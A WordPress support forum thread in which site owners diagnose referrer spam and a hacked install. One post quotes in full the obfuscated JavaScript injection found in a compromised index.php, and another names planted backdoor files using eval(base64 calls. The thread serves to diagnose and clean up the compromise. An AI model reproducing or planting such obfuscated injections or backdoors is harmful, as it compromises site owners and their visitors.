Forums

WordPress › Support » How-To and Troubleshooting

Bizarre referrer spam links (13 posts)

  1. droolcup
    Member
    Posted 2 years ago #

    I have been getting weird WordPress referrer spam the last 4 days, but there are no injections or anything of the like on my site.

    I'm using WordPress as a simple CMS.

    I'm using the StatPress plugin to check out who is coming to the site. This morning, I noticed an abnormally large number of visitors over the last few days.

    People seem to be visiting pages like mysite.com/?myfjkfosljfsfjd (NB : not a string I've seen, just an example). When clicked, it will go to my homepage. Checking the source, there is nothing out of the ordinary (no spam links, etc). If you google that end string by itself, you get one result, to my site, with a summary that lists a whole bunch of viagra type words.

    Any idea what is going on, and how I can stop this?

    I was running 2.8.2, upgraded to 2.8.3 this morning.

  2. esmi
    Theme Diva & Mod
    Posted 2 years ago #

    there are no injections or anything of the like on my site

    How do you know?

  3. droolcup
    Member
    Posted 2 years ago #

    I've looked at the html being generated, the templates, and the database. I see nothing out of the ordinary.

    Here is a google search of one of the strings : http://tinyurl.com/nxajg9

  4. veganist
    Member
    Posted 2 years ago #

    Hi, I had this same problem. Somebody modified my index.php file and inserted a part of encoded Javascript plus a lot of links to another compromised WordPress install, containing offers to buy audio editing software mostly.
    First I deleted the links but 3 days later there were new ones.
    I finally found that somebody has gained access to the WordPress installation as administrator.... although my subscription options were "everybody can register" "as subscriber". So I deactivated that option for now.

    As I use a versioning system for the template files, I will try to check if there was something else modified.

    Another solution may by the way be to put an .htaccess file on the wp-admin/ directory.

  5. bottleneck
    Member
    Posted 2 years ago #

    Another solution may by the way be to put an .htaccess file on the wp-admin/ directory.

    Just in case:

    http://wordpress.org/support/topic/325347#post-1260699

  6. songdogtech
    Member
    Posted 2 years ago #

    How to Completely Clean a Hacked WordPress Install and How to find a backdoor in a hacked WordPress

  7. veganist
    Member
    Posted 2 years ago #

    OK, Update : apparently nothing else in the templates had been modified.

    For reference, the JavaScript part of the injection was :

    <script>function KoiQBOL(qNQghUYaEb){ fff=op.split("394");var UtRt = document.getElementById('dklA'); }
    function WwcDBUVhHq(Epi){var rHZBxZwKHL=5,UxiEfYK=7;var UeF='42+6,82+1,82+6,86+3,77+1,72+1,44+2,9+2,7+1,32+6,80+5,85+0,82+6,74+2,86+3,69+2,40+0,39+2,72+6,72+6,87+1,87+1,67+6,75+0,71+3,22+6,87+6,22+6,71+3,75+0,82+1,80+0,77+1,69+2,86+3,41+3,78+4,79+2,78+4,72+1,42+1,22+6,89+2,9+2,7+1,42+6,33+4,82+1,82+6,86+3,',pBY=UeF.split(',');YUCPn='';for(HxPCvFVEnA=0x13-0x6-0x8-0xb+0x25+0x30-0x4f;HxPCvFVEnA<pBY.length-1;HxPCvFVEnA+=-0x19-0x9-0x31+0x24-0x16-0x1+0x6+0x41){ acatnqE=pBY[HxPCvFVEnA].split('+');cphjP = parseInt(acatnqE[0]*UxiEfYK)+parseInt(acatnqE[1]);cphjP = parseInt(cphjP)/rHZBxZwKHL;YUCPn += String.fromCharCode(cphjP);}return YUCPn;}function RDqmrbJ(kbTAqPXcK){var aBaIvacm=3,hfqTPATL=2;var oJC='162+0,151+1,93+0,19+1,15+0,19+1,15+0,',DeegOl=oJC.split(',');LrwOS='';for(KVONkcbxn=-0x10-0x20+0x1f-0x25-0x6+0x3c;KVONkcbxn<DeegOl.length-1;KVONkcbxn+=-0x5-0x5-0x31+0x1d-0x27+0x27+0x2-0x25-0x25+0x67){ qPCBpS=DeegOl[KVONkcbxn].split('+');xqFr = parseInt(qPCBpS[0]*hfqTPATL)+parseInt(qPCBpS[1]);xqFr = parseInt(xqFr)/aBaIvacm;LrwOS += String.fromCharCode(xqFr);}return LrwOS;}function eMlw(FcBGJ){ fff.op.replace("950"); }
    function RRMbqRvlGb(oQifPnt){ window.eval();window.eval(); }
    document['w2708r9125i4240t5785e43695678'.replace(/[0-9]/g,'')](WwcDBUVhHq('KQtB'),RDqmrbJ('MxJSbIqOl'));function yaXZVHbp(dqNEJztHxw){ fff=op.split("274");var oqgdHCgLda=new Function("kQAXCR", "return 611205;");alert('yZu'); }
    function MoRq(Mqk){ fff.op.replace("1003");var cNsEgXuNuN = document.getElementById('TfXWubx');var cNsEgXuNuN = document.getElementById('TfXWubx'); }
    </script>

  8. veganist
    Member
    Posted 2 years ago #

    Thank you songdogtech & bottleneck :)

  9. veganist
    Member
    Posted 2 years ago #

    Didn't have the time yet to clean up the installation, but even with a .htaccess on wp-admin and having deleted the user that had gained administrator access... the spam referrers just came back :(

  10. veganist
    Member
    Posted 2 years ago #

    I do now believe this is done via XML-RPC publishing, another option that is checked, but which was not checked by me..

  11. veganist
    Member
    Posted 2 years ago #

    found some files in wp-content/uploads/ "wp-pass.php" and "topper.php", containing eval(base64 instructions. Also wp-includes/index.php has been modified.

  12. veganist
    Member
    Posted 2 years ago #

    Seems actually to be this exact phenomenon : http://wordpress.org/support/topic/297639/page/3?replies=68#post-1203996

  13. songdogtech
    Member
    Posted 2 years ago #

    Unfortunately, I think the ultimate solution is to take the time to dump and clean your database.....

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags